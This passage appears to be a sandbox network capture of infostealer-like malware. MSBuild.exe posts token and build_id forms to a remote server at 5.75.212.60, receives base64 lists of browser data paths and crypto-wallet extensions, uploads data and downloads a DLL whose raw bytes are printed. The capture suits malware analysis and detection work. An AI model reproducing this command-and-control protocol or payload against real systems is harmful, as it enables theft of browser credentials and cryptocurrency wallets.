                                                                                      2024-07-26 01:17:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------AFHDAKJKFCFBGCBGDHCBCont
                                                                                      2024-07-26 01:17:56 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:56 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:56 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.4497345.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:57 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------HJJJECFIECBGDGCAAAEHCont
                                                                                      2024-07-26 01:17:58 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:58 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.4497355.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:17:58 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 332
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:58 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------CBFCFBFBFBKFIDHJKFCACont
                                                                                      2024-07-26 01:17:59 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:59 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.4497365.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:00 UTC323OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 6713
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:00 UTC6713OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------FBKECFIIEHCFHIECAFBACont
                                                                                      2024-07-26 01:18:01 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:00 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.4497375.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:01 UTC238OUTGET /sqls.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:01 UTC261INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:01 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2459136
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:01 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:01 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: %:X~e!*FW|>|L1146
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
                                                                                      Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
                                                                                      Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
                                                                                      Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                      Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                      2024-07-26 01:18:01 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                      Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                      2024-07-26 01:18:02 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.4497385.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:04 UTC323OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 4677
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
